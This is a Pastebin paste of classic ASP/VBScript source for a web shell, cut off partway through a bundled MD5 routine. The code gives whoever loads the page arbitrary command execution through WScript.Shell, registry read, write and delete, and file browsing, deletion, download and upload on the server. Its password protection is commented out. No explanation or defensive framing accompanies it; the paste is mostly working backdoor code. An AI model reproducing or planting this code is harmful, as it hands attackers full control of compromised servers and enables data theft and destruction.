API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 23rd, 2019
139
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 42.52 KB | None | 0 0
raw download clone embed print report
  1. <%@ Language = VBScript
  2. CodePage = 1252 %>
  3.  
  4. <%
  5. Option Explicit
  6. '/* --- Options --- */
  7. Server.ScriptTimeout = 360 ' Seconds
  8. Session.Timeout = 5 ' Minutes
  9. Response.Expires = -1 ' Minutes (expires immediately)
  10. Private sMD5Hash ' MD5("HitU")
  11. ''sMD5Hash = "F74648612C416B4CE4B9B36C10B10A11" ' Leave it empty to turn off password protection
  12. 'Session.Abandon ' Terminates last session, prevents hangups
  13. 'On Error Resume Next ' Proceed to the next line on error
  14.  
  15. ' Global variables:
  16. Private WShell, WNetwork, WEnv, FSO, BinStream
  17. Private sURL, sCmd, bBgMode, bSI, sKey, sKeyFunc, sKeyValue, sKeyType
  18. Private sDir, sDel, sDL, sPasswd
  19.  
  20. ' Create COM objects:
  21. Set WShell = Server.CreateObject("WSCRIPT.SHELL")
  22. Set WNetwork = Server.CreateObject("WSCRIPT.NETWORK")
  23. Set WEnv = WShell.Environment("Process")
  24. Set FSO = Server.CreateObject("Scripting.FileSystemObject")
  25.  
  26. ' Process script args:
  27. sURL = Request.ServerVariables("URL") ' Script relative addr.
  28. sCmd = Request("CMD") ' Shell: command
  29. bBgMode = Request("CMD_M") ' Shell: mode
  30. bSI = Request("SI") ' Server info
  31. sKey = Request("RKEY") ' Reg editor: key
  32. sKeyFunc = Request("RKEY_F") ' Reg editor: function
  33. sKeyValue = Request("RKEY_V") ' Reg editor: value
  34. sKeyType = Request("RKEY_T") ' Reg editor: type
  35. sDir = Request("DIR") ' Directory listing: path
  36. sDel = Request("DEL") ' Directory listing: delete item
  37. sDL = Request("DL") ' Download: file path
  38. sPasswd = Request("PWD") ' Password: clear text
  39.  
  40. ' Set default mode:
  41. If ( IsEmpty(sCmd) And _
  42. IsEmpty(bSI) And _
  43. IsEmpty(sKey) And _
  44. IsEmpty(sDir) ) Then
  45. sDir = ""
  46. End If
  47.  
  48. '/* --- Routines --- */
  49.  
  50. ' Executes command and passes stdout to browser.
  51. ' Can start the process in background mode.
  52. Private Sub ExecuteCmd(ByVal sCommand, ByVal bBg)
  53. Dim Pipe, RetCode
  54. On Error Resume Next
  55. If ( bBg <> "" ) Then
  56. RetCode = WShell.Run("%comspec% /c " & sCommand & " 2>&1", 0, False)
  57. Response.Write("Returned: " & RetCode)
  58. Else
  59. Set Pipe = WShell.Exec("%comspec% /c " & sCommand & " 2>&1")
  60. While( Not Pipe.StdOut.AtEndOfStream )
  61. Response.Write(Server.HTMLEncode(Pipe.StdOut.ReadAll()))
  62. WEnd
  63. Response.Write("Returned: " & Pipe.ExitCode)
  64. End If
  65. ' Error handling:
  66. If ( Err.Number <> 0 ) Then
  67. Response.Write("Error: '" & Err.Description & "' [" & Err.Number & "]")
  68. Err.Clear
  69. End If
  70. Set Pipe = nothing
  71. Set RetCode = nothing
  72. End Sub
  73.  
  74. ' Returns first word from the string. Used in shell page title.
  75. Private Function GetFirstWord(ByVal sStr)
  76. Dim Word
  77. If ( Len(sStr) <> 0 ) Then
  78. Word = Split(sStr)
  79. GetFirstWord = Word(0)
  80. Else
  81. GetFirstWord = "[ Shell ]"
  82. End if
  83. Set Word = nothing
  84. End Function
  85.  
  86. ' Changes empty string to nbsp. Useful while building HTML tables.
  87. Private Function EmptyToNbsp(ByVal sStr)
  88. If ( sStr = "" ) Then
  89. sStr = "&nbsp;"
  90. End If
  91. EmptyToNbsp = sStr
  92. End Function
  93.  
  94. ' Converts unicode string to byte string.
  95. Private Function CStrB(ByRef sUnicodeStr)
  96. Dim nPos
  97. For nPos = 1 To Len(sUnicodeStr)
  98. CStrB = CStrB & ChrB( AscB( Mid(sUnicodeStr, nPos, 1)))
  99. Next
  100. End Function
  101.  
  102. ' Converts byte string to unicode string.
  103. Private Function CStrU(ByRef sByteStr)
  104. Dim nPos
  105. For nPos = 1 To LenB(sByteStr)
  106. CStrU = CStrU & Chr( AscB( MidB(sByteStr, nPos, 1)))
  107. Next
  108. End Function
  109.  
  110. ' Returns string, containing HTML table with drives info.
  111. Private Function ShowDrivesInfo()
  112. On Error Resume Next
  113. Dim Drive, Share, Str
  114. ' Table header:
  115. Str = "<table border='1' cellspacing='0' cellpadding='2' width='600'>" & _
  116. "<tr align='center'><th colspan='9'>Drives Info</th></tr>" & _
  117. "<tr align='center'><th>Drive</th><th>Type</th><th>Label</th>" & _
  118. "<th>Filesystem</th><th>Size[Mb]</th><th>Avail[Mb]</th><th>Free[Mb]</th>" & _
  119. "<th>Shared</th><th>Ready</th></tr>"
  120. ' Enumerate drives:
  121. For Each Drive in FSO.Drives
  122. Str = Str & "<tr align='center' class='drv'><td>" & Drive.DriveLetter & "</td>"
  123. Select Case Drive.DriveType
  124. Case 0: Str = Str & "<td>Unknown</td>"
  125. Case 1: Str = Str & "<td>Removable</td>"
  126. Case 2: Str = Str & "<td>Fixed</td>"
  127. Case 3: Str = Str & "<td>Network</td>"
  128. Case 4: Str = Str & "<td>CD-ROM</td>"
  129. Case 5: Str = Str & "<td>RAM Disk</td>"
  130. End Select
  131. ' Prevents from 500 - "drive not ready" error:
  132. If Drive.IsReady Then
  133. Str = Str & "<td>" & EmptyToNbsp(Drive.VolumeName) & "</td>"
  134. Str = Str & "<td>" & Drive.FileSystem & "</td>"
  135. Str = Str & "<td>" & FormatNumber(Drive.TotalSize / 1048576, 0) & "</td>"
  136. Str = Str & "<td>" & FormatNumber(Drive.AvailableSpace / 1048576, 0) & "</td>"
  137. Str = Str & "<td>" & FormatNumber(Drive.FreeSpace / 1048576, 0) & "</td>"
  138. Else
  139. Str = Str & "<td>-</td><td>-</td><td>-</td><td>-</td><td>-</td>"
  140. End If
  141. If (Drive.ShareName = "") Then
  142. Str = Str & "<td>-</td>"
  143. Else
  144. Str = Str & "<td>" & Drive.ShareName & "</td>"
  145. End If
  146. Str = Str & "<td>" & Drive.IsReady & "</td></tr>"
  147. Next
  148. ' Error handling:
  149. If ( Err.Number <> 0 ) Then
  150. Response.Write( "Error: '" & Err.Description & "' at " & Err.Source & " [" & Err.Number & "]" )
  151. Err.Clear
  152. End If
  153. ShowDrivesInfo = Str & "</table>"
  154. Set Drive = nothing
  155. Set Share = nothing
  156. Set Str = nothing
  157. End Function
  158.  
  159. ' Provides interface for registry read/write/delete functions.
  160. Private Function RegEditor(ByVal sKey, ByVal sKeyValue, ByVal sKeyType, ByVal sKeyFunc)
  161. On Error Resume Next
  162. Select Case sKeyFunc
  163. Case "Read" Response.Write(WShell.RegRead(sKey))
  164. Case "Write"
  165. If ( sKeyType = "REG_SZ" or _
  166. sKeyType = "REG_DWORD" or _
  167. sKeyType = "REG_BINARY" or _
  168. sKeyType = "REG_EXPAND_SZ" ) Then
  169. If ( Not IsEmpty(sKeyValue) ) Then
  170. Response.Write(WShell.RegWrite(sKey, sKeyValue, sKeyType))
  171. Else
  172. Response.Write("Key value is not defined.")
  173. End If
  174. Else
  175. Response.Write("Improper key type.")
  176. End If
  177. Case "Delete" Response.Write(WShell.RegDelete(sKey))
  178. Case Else Response.Write("Improper function value.")
  179. End Select
  180. ' Error handling:
  181. If ( Err.Number <> 0 ) Then
  182. Response.Write( "Error: '" & Err.Description & "' at " & Err.Source & " [" & Err.Number & "]" )
  183. Err.Clear
  184. Else
  185. Response.Write("Successfully performed the operation.")
  186. End If
  187. End Function
  188.  
  189. ' Returns directory path without trailing slash.
  190. Private Function GetCorrectPath(ByVal sDir)
  191. Dim sDirPath
  192. ' Starting folder:
  193. If ( sDir = "" ) Then
  194. sDir = Server.MapPath(".")
  195. End If
  196. ' Get correct folder path:
  197. If ( FSO.FolderExists(sDir) ) Then
  198. sDirPath = FSO.GetFolder(sDir).Path
  199. Else
  200. sDirPath = sDir
  201. End If
  202. GetCorrectPath = sDirPath
  203. Set sDirPath = nothing
  204. End Function
  205.  
  206. ' Returns string with HTML table.
  207. Private Function ShowDirectoryList(ByVal sDir)
  208. On Error Resume Next
  209. Dim sDirPath, Str, Folder, Item, Attr
  210.  
  211. sDirPath = GetCorrectPath(sDir)
  212. Set Folder = FSO.GetFolder(sDirPath)
  213.  
  214. ' Path input field:
  215. Str = "<center><form name='path' action='" & sURL & "' method='POST'>" & _
  216. "<input name='DIR' type='text' style='width:80%;' value='" & sDirPath & "'>" & _
  217. "&nbsp;<input type='submit' class='button' value='Go'></form><br>"
  218.  
  219. ' Check the path:
  220. If ( Not FSO.FolderExists(sDirPath) ) Then
  221. ShowDirectoryList = Str & "Folder <b>" & sDirPath & "</b> doesn't exist.<br>"
  222. Exit Function
  223. End If
  224.  
  225. ' Table header:
  226. Str = Str & "Contents of <b>" & sDirPath & "</b><br><br>" & _
  227. "<form name='items' action='" & sURL & "' method='POST'>" & _
  228. "<input name='DIR' type='hidden' value='" & sDirPath & "'>" & _
  229. "<input name='DEL' type='hidden' value=''>" & _
  230. "<table border='1' cellpadding='0' cellspacing='0' width='90%'>" & _
  231. "<tr><th>&nbsp;</th><th>Name</th><th>Size[b]</th>" & _
  232. "<th>Date Created</th><th>Attributes</th><th>Type</th></tr>"
  233.  
  234. ' Parent directory:
  235. If ( Not Folder.IsRootFolder ) Then
  236. Str = Str & "<tr onMouseOver='this.style.backgroundColor=""#eeeeee""'" & _
  237. " onMouseOut='this.style.backgroundColor=""""' class='dir'>" & _
  238. "<td>&nbsp;</td>" & _
  239. "<td class='dir' onclick='go("".."");'>&lt;..&gt;</td>" & _
  240. "<td>&nbsp;</td>" & _
  241. "<td>&nbsp;</td>" & _
  242. "<td>&nbsp;</td>" & _
  243. "<td>Parent Folder</td></tr>" & vbCRLF
  244. End If
  245.  
  246. ' Directories:
  247. For Each Item In Folder.SubFolders
  248. If ( Item.Attributes And 1 ) Then
  249. Attr = "R(" & Item.Attributes & ")"
  250. Else
  251. Attr = "RW(" & Item.Attributes & ")"
  252. End If
  253. Str = Str & "<tr onMouseOver='this.style.backgroundColor=""#eeeeee""'" & _
  254. " onMouseOut='this.style.backgroundColor=""""' class='dir'>" & _
  255. "<td><input type='button' class='button' style='width:28;'" & _
  256. " value='Del' onclick='del(""" & Item.Name & "\\"");'></td>" & _
  257. "<td class='dir' onclick='go(""" & Item.Name & """);'>" & _
  258. "&lt;" & Item.Name & "&gt;</td>" & _
  259. "<td>" & FormatNumber(Item.Size, 0) & "</td>" & _
  260. "<td>" & Item.DateCreated & "</td>" & _
  261. "<td>" & Attr & "</td>" & _
  262. "<td>" & Item.Type & "</td></tr>" & vbCRLF
  263. Next
  264.  
  265. ' Files:
  266. For Each Item In Folder.Files
  267. ' Add cacls?
  268. If ( Item.Attributes And 1 ) Then
  269. Attr = "R(" & Item.Attributes & ")"
  270. Else
  271. Attr = "RW(" & Item.Attributes & ")"
  272. End If
  273. Str = Str & "<tr onMouseOver='this.style.backgroundColor=""#eeeeee""'" & _
  274. " onMouseOut='this.style.backgroundColor=""""' class='file'>" & _
  275. "<td><input type='button' class='button' style='width:28;'" & _
  276. " value='Del' onclick='del(""" & Item.Name & """);'></td>" & _
  277. "<td class='file' onclick='dl(""" & Item.Name & """);'>" & _
  278. Item.Name & "</td>" & _
  279. "<td>" & FormatNumber(Item.Size, 0) & "</td>" & _
  280. "<td>" & Item.DateCreated & "</td>" & _
  281. "<td>" & Attr & "</td>" & _
  282. "<td>" & Item.Type & "</td></tr>" & vbCRLF
  283. Next
  284. Str = Str & "</table></form><br><br>"
  285.  
  286. ' Download form:
  287. Str = Str & "<form name='download' action='" & sURL & "' method='POST'>" & _
  288. "<input name='DL' type='hidden' value='" & sDirPath & "'></form>" & _
  289. "<form name='upload' enctype='multipart/form-data' action='" & sURL & "' method='POST'>" & _
  290. "<input name='UL' type='hidden' value='" & sDirPath & "'>" & _
  291. "<input name='FILE' type='file' style='width:80%;'>&nbsp;" & _
  292. "<input type='submit' class='button' value='Upload'></form><br><br></center>"
  293.  
  294. ' Error handling:
  295. If ( Err.Number <> 0 ) Then
  296. Str = Str & "<center>Error: '" & Err.Description & "' [" & Err.Number & "]</center><br><br>"
  297. Err.Clear
  298. End If
  299.  
  300. ShowDirectoryList = Str
  301. Set sDirPath = nothing
  302. Set Str = nothing
  303. Set Folder = nothing
  304. Set Item = nothing
  305. Set Attr = nothing
  306. End Function
  307.  
  308. ' Upload FSO buffering.
  309. Private Function BufferContent(ByRef Data)
  310. Dim sContent(64), i
  311. ClearString(sContent)
  312. For i = 1 To LenB(Data)
  313. AddString sContent, Chr(AscB (MidB (Data, i, 1)))
  314. Next
  315. BufferContent = ReadString(sContent)
  316. End Function
  317.  
  318. Private Sub ClearString(ByRef sPart)
  319. Dim nIdx
  320. For nIdx = 0 to 64
  321. sPart(nIdx) = ""
  322. Next
  323. End Sub
  324.  
  325. Private Sub AddString(ByRef sPart, ByRef Str)
  326. Dim Tmp, nIdx
  327. sPart(0) = sPart(0) & Str
  328. If ( Len(sPart(0)) > 64 ) Then
  329. nIdx = 0
  330. Tmp = ""
  331. Do
  332. Tmp = sPart(nIdx) & Tmp
  333. sPart(nIdx) = ""
  334. nIdx = nIdx + 1
  335. Loop Until sPart(nIdx) = ""
  336. sPart(nIdx) = Tmp
  337. End If
  338. End Sub
  339.  
  340. Private Function ReadString(ByRef sPart)
  341. Dim Tmp, nIdx
  342. Tmp = ""
  343. For nIdx = 0 to 64
  344. If ( sPart(nIdx) <> "" ) Then
  345. Tmp = sPart(nIdx) & Tmp
  346. End If
  347. Next
  348. ReadString = Tmp
  349. End Function
  350.  
  351. ' Saves uploaded file.
  352. Private Sub UploadFile()
  353. Dim BinData, nObjStartPos, nObjEndPos, nStartPos, nEndPos, sBoundary
  354. Dim sFileName, sSavePath, nFileLen, BinFile, PostBinStream
  355.  
  356. On Error Resume Next
  357. Err.Clear
  358. BinData = Request.BinaryRead(Request.TotalBytes)
  359.  
  360. ' Get the boundary:
  361. nStartPos = 1
  362. nEndPos = InStrB(nStartPos, BinData, CStrB(vbCR))
  363. If ( nEndPos > nStartPos ) Then
  364. sBoundary = MidB(BinData, nStartPos, nEndPos - nStartPos)
  365. Else
  366. Response.Write("Error: Boundary is not defined.")
  367. StopScript
  368. End If
  369.  
  370. ' Get the upload directory("UL"):
  371. nObjStartPos = InStrB(1, BinData, sBoundary)
  372. nObjEndPos = InStrB(nObjStartPos + 1, BinData, sBoundary)
  373. nStartPos = InStrB(nObjStartPos, BinData, CStrB("name=""UL"""))
  374. If ( nStartPos > nObjStartPos And nStartPos < nObjEndPos ) Then
  375. nEndPos = InStrB(nStartPos + 13, BinData, CStrB(vbCR))
  376. ' nStartPos + 13 -> name="UL"+ 0x0D + 0x0A + 0x0D + 0x0A
  377. sDir = CStrU(MidB(BinData, nStartPos + 13, nEndPos - nStartPos - 13))
  378. Else
  379. Response.Write("Error: Upload directory(""UL"") is not defined.")
  380. StopScript
  381. End If
  382.  
  383. ' Get file's binary data:
  384. nObjStartPos = nObjEndPos
  385. nObjEndPos = InStrB(nObjStartPos + 1, BinData, sBoundary & CStrB("--"))
  386. nStartPos = InStrB(nObjStartPos + 1, BinData, CStrB("name=""FILE"""))
  387. If ( nStartPos > 0 And nObjEndPos > nObjStartPos ) Then
  388. ' Get the filename:
  389. nStartPos = InStrB(nStartPos, BinData, CStrB("filename="""))
  390. nEndPos = InStrB(nStartPos + 10, BinData, CStrB(""""))
  391. If ( nStartPos + 10 = nEndPos Or nStartPos = 0 ) Then
  392. Response.Write("Uploaded: 0 bytes [Empty filename] ")
  393. Exit Sub
  394. End If
  395. sFileName = CStrU(MidB(BinData, nStartPos + 10, nEndPos - nStartPos - 10))
  396.  
  397. ' Change all '/' to '\':
  398. sFileName = Replace(sFileName, "/", "\")
  399. sFileName = Right(sFileName, Len(sFileName) - InStrRev(sFileName, "\"))
  400. sFileName = Trim(sFileName)
  401.  
  402. ' Skip Content-Type:
  403. nStartPos = InStrB(nEndPos, BinData, CStrB("Content-Type:"))
  404. nEndPos = InStrB(nStartPos + 13, BinData, CStrB(vbCR))
  405. If ( nStartPos = 0 or nEndPos = 0 ) Then
  406. Response.Write("Error: Content-Type is not defined.")
  407. StopScript
  408. End If
  409.  
  410. ' Skip CRLFs and set pointers to file's binary data:
  411. nStartPos = nEndPos + 3
  412. nEndPos = nObjEndPos - 3
  413. nFileLen = nEndPos - nStartPos
  414. BinFile = MidB(BinData, nStartPos + 1, nFileLen)
  415. sSavePath = FSO.BuildPath(sDir, sFileName)
  416.  
  417. ' Save binary data into the destination file:
  418. SetLocale(1033)
  419. Err.Clear
  420. Set PostBinStream = Server.CreateObject("ADODB.Stream")
  421. Set BinStream = Server.CreateObject("ADODB.Stream")
  422. If ( Err.Number = 0 ) Then
  423. PostBinStream.Type = 1 ' adTypeBinary
  424. PostBinStream.Open()
  425. PostBinStream.Write(BinData)
  426. PostBinStream.Position = nStartPos
  427. BinStream.Type = 1
  428. BinStream.Open()
  429. PostBinStream.CopyTo BinStream, nFileLen
  430. ' Overwrites file:
  431. BinStream.SaveToFile sSavePath, 2
  432. BinStream.Close()
  433. PostBinStream.Close()
  434. Else
  435. Err.Clear
  436. ' Use FSO (only text data), if ADO.Stream is not there:
  437. Set BinStream = FSO.CreateTextFile(sSavePath, True)
  438. BinStream.Write(BufferContent(BinFile))
  439. BinStream.Close()
  440. End If
  441. Response.Write("Uploaded: " & FormatNumber(nFileLen, 0) & " bytes [""" & sSavePath & """] ")
  442. Else
  443. Response.Write("Error: File's binary data parse error.")
  444. StopScript
  445. End If
  446.  
  447. ' Error handling:
  448. If ( Err.Number <> 0 ) Then
  449. Response.Write("Error: '" & Err.Description & "' [" & Err.Number & "]")
  450. Err.Clear
  451. End If
  452.  
  453. ' Free mallocs ;)
  454. Set BinData = nothing : Set nObjStartPos = nothing
  455. Set nObjEndPos = nothing : Set nStartPos = nothing
  456. Set nEndPos = nothing : Set sBoundary = nothing
  457. Set sFileName = nothing : Set sSavePath = nothing
  458. Set nFileLen = nothing : Set BinFile = nothing
  459. Set PostBinStream = nothing
  460. End Sub
  461.  
  462. ' Generates script navigation HTML string.
  463. Private Function InsertNavBar()
  464. Dim Str
  465. Str = "<center><form name='nav' action='" & sURL & "' method='POST'>" & _
  466. "<input name='change' type='hidden' value=''></form>&lt;&nbsp;" & _
  467. "<span class='link' onMouseOver='this.style.backgroundColor=""#eeeeee""'" & _
  468. " onMouseOut='this.style.backgroundColor=""""'" & _
  469. " onclick='document.nav.change.name=""DIR"";document.nav.submit()'>" & _
  470. "Directory Listing</span>&nbsp;|&nbsp;" & _
  471. "<span class='link' onMouseOver='this.style.backgroundColor=""#eeeeee""'" & _
  472. " onMouseOut='this.style.backgroundColor=""""'" & _
  473. " onclick='document.nav.change.name=""CMD"";document.nav.submit()'>" & _
  474. "Shell</span>&nbsp;|&nbsp;" & _
  475. "<span class='link' onMouseOver='this.style.backgroundColor=""#eeeeee""'" & _
  476. " onMouseOut='this.style.backgroundColor=""""'" & _
  477. " onclick='document.nav.change.name=""RKEY"";document.nav.submit()'>" & _
  478. "Registry Editor</span>&nbsp;|&nbsp;" & _
  479. "<span class='link' onMouseOver='this.style.backgroundColor=""#eeeeee""'" & _
  480. " onMouseOut='this.style.backgroundColor=""""'" & _
  481. " onclick='document.nav.change.name=""SI"";document.nav.submit()'>" & _
  482. "Server Info</span>&nbsp;&gt;</center><br><br>"
  483. InsertNavBar = Str
  484. Set Str = nothing
  485. End Function
  486.  
  487. ' Generates auth. page and checks for proper password.
  488. Private Function CheckAuth(ByVal sPasswd)
  489. Dim Str
  490. If ( sMD5Hash = "" ) Then
  491. Exit Function
  492. End If
  493. ' Save the hash in a session variable:
  494. If ( Not IsEmpty(sPasswd) ) Then
  495. Session("Auth") = MD5(sPasswd)
  496. End If
  497. ' Check the password:
  498. If ( IsEmpty(Session("Auth")) ) Then
  499. Str = "<html><head><title>Authentication</title></head><body><center>" & _
  500. "Enter the password: <form name='download' action='" & sURL & "' method='POST'>" & _
  501. "<input name='PWD' type='text' style='width:80%;' value=''>&nbsp;" & _
  502. "<input type='submit' value='Submit'></form></body></html>"
  503. Response.Write(Str)
  504. Session.Abandon
  505. StopScript
  506. Else
  507. If ( UCase(Session("Auth")) <> UCase(sMD5Hash) ) Then
  508. Response.Write("Bad password or session has timed out.")
  509. Session.Abandon
  510. StopScript
  511. End If
  512. End If
  513. End Function
  514.  
  515. ' MD5 Routines.
  516. ' Ripped from frez.co.uk
  517. Private Const BITS_TO_A_BYTE = 8
  518. Private Const BYTES_TO_A_WORD = 4
  519. Private Const BITS_TO_A_WORD = 32
  520. Private m_lOnBits(30)
  521. Private m_l2Power(30)
  522. m_lOnBits(0) = CLng(1)
  523. m_lOnBits(1) = CLng(3)
  524. m_lOnBits(2) = CLng(7)
  525. m_lOnBits(3) = CLng(15)
  526. m_lOnBits(4) = CLng(31)
  527. m_lOnBits(5) = CLng(63)
  528. m_lOnBits(6) = CLng(127)
  529. m_lOnBits(7) = CLng(255)
  530. m_lOnBits(8) = CLng(511)
  531. m_lOnBits(9) = CLng(1023)
  532. m_lOnBits(10) = CLng(2047)
  533. m_lOnBits(11) = CLng(4095)
  534. m_lOnBits(12) = CLng(8191)
  535. m_lOnBits(13) = CLng(16383)
  536. m_lOnBits(14) = CLng(32767)
  537. m_lOnBits(15) = CLng(65535)
  538. m_lOnBits(16) = CLng(131071)
  539. m_lOnBits(17) = CLng(262143)
  540. m_lOnBits(18) = CLng(524287)
  541. m_lOnBits(19) = CLng(1048575)
  542. m_lOnBits(20) = CLng(2097151)
  543. m_lOnBits(21) = CLng(4194303)
  544. m_lOnBits(22) = CLng(8388607)
  545. m_lOnBits(23) = CLng(16777215)
  546. m_lOnBits(24) = CLng(33554431)
  547. m_lOnBits(25) = CLng(67108863)
  548. m_lOnBits(26) = CLng(134217727)
  549. m_lOnBits(27) = CLng(268435455)
  550. m_lOnBits(28) = CLng(536870911)
  551. m_lOnBits(29) = CLng(1073741823)
  552. m_lOnBits(30) = CLng(2147483647)
  553. m_l2Power(0) = CLng(1)
  554. m_l2Power(1) = CLng(2)
  555. m_l2Power(2) = CLng(4)
  556. m_l2Power(3) = CLng(8)
  557. m_l2Power(4) = CLng(16)
  558. m_l2Power(5) = CLng(32)
  559. m_l2Power(6) = CLng(64)
  560. m_l2Power(7) = CLng(128)
  561. m_l2Power(8) = CLng(256)
  562. m_l2Power(9) = CLng(512)
  563. m_l2Power(10) = CLng(1024)
  564. m_l2Power(11) = CLng(2048)
  565. m_l2Power(12) = CLng(4096)
  566. m_l2Power(13) = CLng(8192)
  567. m_l2Power(14) = CLng(16384)
  568. m_l2Power(15) = CLng(32768)
  569. m_l2Power(16) = CLng(65536)
  570. m_l2Power(17) = CLng(131072)
  571. m_l2Power(18) = CLng(262144)
  572. m_l2Power(19) = CLng(524288)
  573. m_l2Power(20) = CLng(1048576)
  574. m_l2Power(21) = CLng(2097152)
  575. m_l2Power(22) = CLng(4194304)
  576. m_l2Power(23) = CLng(8388608)
  577. m_l2Power(24) = CLng(16777216)
  578. m_l2Power(25) = CLng(33554432)
  579. m_l2Power(26) = CLng(67108864)
  580. m_l2Power(27) = CLng(134217728)
  581. m_l2Power(28) = CLng(268435456)
  582. m_l2Power(29) = CLng(536870912)
  583. m_l2Power(30) = CLng(1073741824)
  584.  
  585. Private Function LShift(ByVal lValue, ByVal iShiftBits)
  586. If ( iShiftBits = 0 ) Then
  587. LShift = lValue
  588. Exit Function
  589. ElseIf ( iShiftBits = 31 ) Then
  590. If lValue And 1 Then
  591. LShift = &H80000000
  592. Else
  593. LShift = 0
  594. End If
  595. Exit Function
  596. ElseIf ( iShiftBits < 0 Or iShiftBits > 31 ) Then
  597. Err.Raise(6)
  598. End If
  599. If ( lValue And m_l2Power(31 - iShiftBits) ) Then
  600. LShift = ((lValue And m_lOnBits(31 - (iShiftBits + 1))) * m_l2Power(iShiftBits)) Or &H80000000
  601. Else
  602. LShift = ((lValue And m_lOnBits(31 - iShiftBits)) * m_l2Power(iShiftBits))
  603. End If
  604. End Function
  605.  
  606. Private Function RShift(lValue, iShiftBits)
  607. If ( iShiftBits = 0 ) Then
  608. RShift = lValue
  609. Exit Function
  610. ElseIf ( iShiftBits = 31 ) Then
  611. If ( lValue And &H80000000 ) Then
  612. RShift = 1
  613. Else
  614. RShift = 0
  615. End If
  616. Exit Function
  617. ElseIf ( iShiftBits < 0 Or iShiftBits > 31 ) Then
  618. Err.Raise(6)
  619. End If
  620. RShift = (lValue And &H7FFFFFFE) \ m_l2Power(iShiftBits)
  621. If ( lValue And &H80000000 ) Then
  622. RShift = (RShift Or (&H40000000 \ m_l2Power(iShiftBits - 1)))
  623. End If
  624. End Function
  625.  
  626. Private Function RotateLeft(lValue, iShiftBits)
  627. RotateLeft = LShift(lValue, iShiftBits) Or RShift(lValue, (32 - iShiftBits))
  628. End Function
  629.  
  630. Private Function AddUnsigned(lX, lY)
  631. Dim lX4, lY4, lX8, lY8, lResult
  632. lX8 = lX And &H80000000
  633. lY8 = lY And &H80000000
  634. lX4 = lX And &H40000000
  635. lY4 = lY And &H40000000
  636. lResult = (lX And &H3FFFFFFF) + (lY And &H3FFFFFFF)
  637. If ( lX4 And lY4 ) Then
  638. lResult = lResult Xor &H80000000 Xor lX8 Xor lY8
  639. ElseIf ( lX4 Or lY4 ) Then
  640. If ( lResult And &H40000000 ) Then
  641. lResult = lResult Xor &HC0000000 Xor lX8 Xor lY8
  642. Else
  643. lResult = lResult Xor &H40000000 Xor lX8 Xor lY8
  644. End If
  645. Else
  646. lResult = lResult Xor lX8 Xor lY8
  647. End If
  648. AddUnsigned = lResult
  649. End Function
  650.  
  651. Private Function F(x, y, z)
  652. F = (x And y) Or ((Not x) And z)
  653. End Function
  654.  
  655. Private Function G(x, y, z)
  656. G = (x And z) Or (y And (Not z))
  657. End Function
  658.  
  659. Private Function H(x, y, z)
  660. H = (x Xor y Xor z)
  661. End Function
  662.  
  663. Private Function I(x, y, z)
  664. I = (y Xor (x Or (Not z)))
  665. End Function
  666.  
  667. Private Sub FF(a, b, c, d, x, s, ac)
  668. a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac))
  669. a = RotateLeft(a, s)
  670. a = AddUnsigned(a, b)
  671. End Sub
  672.  
  673. Private Sub GG(a, b, c, d, x, s, ac)
  674. a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac))
  675. a = RotateLeft(a, s)
  676. a = AddUnsigned(a, b)
  677. End Sub
  678.  
  679. Private Sub HH(a, b, c, d, x, s, ac)
  680. a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac))
  681. a = RotateLeft(a, s)
  682. a = AddUnsigned(a, b)
  683. End Sub
  684.  
  685. Private Sub II(a, b, c, d, x, s, ac)
  686. a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac))
  687. a = RotateLeft(a, s)
  688. a = AddUnsigned(a, b)
  689. End Sub
  690.  
  691. Private Function ConvertToWordArray(sMessage)
  692. Dim lMessageLength, lNumberOfWords, lWordArray(), lBytePosition, lByteCount, lWordCount
  693. Const MODULUS_BITS = 512
  694. Const CONGRUENT_BITS = 448
  695. lMessageLength = Len(sMessage)
  696. lNumberOfWords = (((lMessageLength + ((MODULUS_BITS - CONGRUENT_BITS) \ BITS_TO_A_BYTE)) \ (MODULUS_BITS \ BITS_TO_A_BYTE)) + 1) * (MODULUS_BITS \ BITS_TO_A_WORD)
  697. ReDim lWordArray(lNumberOfWords - 1)
  698. lBytePosition = 0
  699. lByteCount = 0
  700. Do Until lByteCount >= lMessageLength
  701. lWordCount = lByteCount \ BYTES_TO_A_WORD
  702. lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE
  703. lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(Asc(Mid(sMessage, lByteCount + 1, 1)), lBytePosition)
  704. lByteCount = lByteCount + 1
  705. Loop
  706. lWordCount = lByteCount \ BYTES_TO_A_WORD
  707. lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE
  708. lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(&H80, lBytePosition)
  709. lWordArray(lNumberOfWords - 2) = LShift(lMessageLength, 3)
  710. lWordArray(lNumberOfWords - 1) = RShift(lMessageLength, 29)
  711. ConvertToWordArray = lWordArray
  712. End Function
  713.  
  714. Private Function WordToHex(lValue)
  715. Dim lByte, lCount
  716. For lCount = 0 To 3
  717. lByte = RShift(lValue, lCount * BITS_TO_A_BYTE) And m_lOnBits(BITS_TO_A_BYTE - 1)
  718. WordToHex = WordToHex & Right("0" & Hex(lByte), 2)
  719. Next
  720. End Function
  721.  
  722. Private Function MD5(sMessage)
  723. Dim x, k, AA, BB, CC, DD, a, b, c, d
  724. Const S11 = 7
  725. Const S12 = 12
  726. Const S13 = 17
  727. Const S14 = 22
  728. Const S21 = 5
  729. Const S22 = 9
  730. Const S23 = 14
  731. Const S24 = 20
  732. Const S31 = 4
  733. Const S32 = 11
  734. Const S33 = 16
  735. Const S34 = 23
  736. Const S41 = 6
  737. Const S42 = 10
  738. Const S43 = 15
  739. Const S44 = 21
  740. x = ConvertToWordArray(sMessage)
  741. a = &H67452301
  742. b = &HEFCDAB89
  743. c = &H98BADCFE
  744. d = &H10325476
  745. For k = 0 To UBound(x) Step 16
  746. AA = a
  747. BB = b
  748. CC = c
  749. DD = d
  750. FF a, b, c, d, x(k + 0), S11, &HD76AA478
  751. FF d, a, b, c, x(k + 1), S12, &HE8C7B756
  752. FF c, d, a, b, x(k + 2), S13, &H242070DB
